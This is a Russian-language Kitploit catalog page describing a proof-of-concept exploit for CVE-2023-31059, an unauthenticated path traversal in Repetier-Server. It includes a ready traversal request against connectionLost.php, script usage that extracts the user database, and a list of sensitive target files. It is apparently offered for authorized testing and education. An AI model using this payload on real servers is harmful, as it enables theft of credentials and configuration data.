Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — Эксплойт доказательства концепции для CVE-2023-31059, неаутентифицированный обход каталогов в Repetier-Server ≤1.4.10, позволяющий читать произвольные файлы через специально сформированные HTTP-запросы. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

Эксплойт доказательства концепции для CVE-2023-31059, неаутентифицированный обход каталогов в Repetier-Server ≤1.4.10, позволяющий читать произвольные файлы через специально сформированные HTTP-запросы.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Repetier-Server <= 1.4.10

Автор: Мохаммед Идрис Баньямер
Роль: Исследователь безопасности
Страна: Иордания 🇯🇴


Обзор

Эксплойт proof‑of‑concept для неавторизованного удаленного обхода пути / LFI уязвимости в Repetier‑Server ≤ 1.4.10.

Уязвимость позволяет читать произвольные файлы через специально созданные последовательности ..%5c в конечной точке connectionLost.php.


Детали уязвимости

ПолеЗначение
ПродуктRepetier‑Server
Затронутые версии≤ 1.4.10
CVECVE‑2023‑31059
ТипОбход пути / LFI
АутентификацияОтсутствует
ВекторСеть
ВлияниеЧтение произвольных файлов
CVSS9.8 Критический

Схема атаки PoC

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

Пример эксплуатации

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

Использование

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

Требования

root@kitploit:~
pip install requests

Ценные цели

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

Отказ от ответственности

Данный PoC предоставляется только для образовательных целей и авторизованного тестирования безопасности. Используйте только на системах, которые вам принадлежат или на которые вы имеете явное разрешение для тестирования.


Контакты

GitHub: https://github.com/mbanyamer

Скачать инструмент